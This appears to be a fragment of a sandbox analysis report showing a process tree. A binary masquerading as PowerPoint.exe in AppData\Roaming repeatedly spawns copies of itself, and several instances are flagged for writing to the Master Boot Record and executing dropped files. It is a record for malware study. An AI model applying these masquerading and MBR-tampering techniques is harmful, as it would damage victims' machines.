C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10280
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11368
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15296
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:7000
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:9428
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:10984 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:24844
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21320
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:4304
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:7736
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:15240
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6912
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21672
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:16432
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:39400
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:28260 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13804
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:26168
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:7452
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:29396 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12476
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:11080
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:25848
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15248
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:3524
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10720
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13316
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11616
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:7100
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21284
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6100
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21568
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:26232
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:27520 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10748
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28548
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13760
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:26724
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:39668
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:29244
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:11364
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:13012
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:14596
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20264
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Executes dropped EXE
PID:5920 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:2840 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10860
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:32812
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:11684
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:19680
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21120
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13392
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:25660
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:4996
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21528
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:15708
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:12652
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:20132
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27892
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:9864
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:11804
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:15316
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:4816
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:35864
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:17256
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:7104
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:30960
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5544
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12892
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:7580
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:28968
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:14816
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:39604
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:7056 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10804
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13432
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5172
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:3992
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21132
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13684
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:23516
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:39556
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:21516 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:36344
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:22024
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14880
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:548
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27560
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:8616
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:28588 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:39432
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:25076
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:15280
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:2256
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:35748
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:3208
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:37844
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:21808
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:38284
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:26048
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15076
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6980
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:8072 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10880
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:39228
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:25120
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:20084
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:26296
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21164
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13476
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:26648
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5988
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21552
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13668
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:4532
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27956
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:32688
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:20520
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6076
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:35568
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:21872
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:36908
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5224
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:4840
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12460
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20176
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:9228 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21044
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:8740
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21464
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:7516
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27676
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12876
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:9744
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14968
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6728
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:28680
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:39632
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:11416
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6184
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:35532
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11516
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:38116 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:8684
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15748
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:4300
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15020
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6868
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:9968
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21116
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:7532
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:21496 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:16064
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:9740
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:15224
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:39364
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27508
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13056
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5284
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:28740
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:15712
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:1784
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5356
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:35704
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:8916
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:37948
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:26388
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10432
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:22156
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15068
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:1360
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:11028
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:14368
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:7044
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21236
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:28612
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:26596
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20404
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21624
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:28808
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12052
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:5388
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:28204
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13652
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:24948
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:3108
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:30208 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:22876
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10596
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:1384
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15180
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:4796
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Executes dropped EXE
PID:6492 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10196
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:20984
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13812
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14420
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:21372 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12400
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21792
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5936
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27444
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:1720
-
-
-
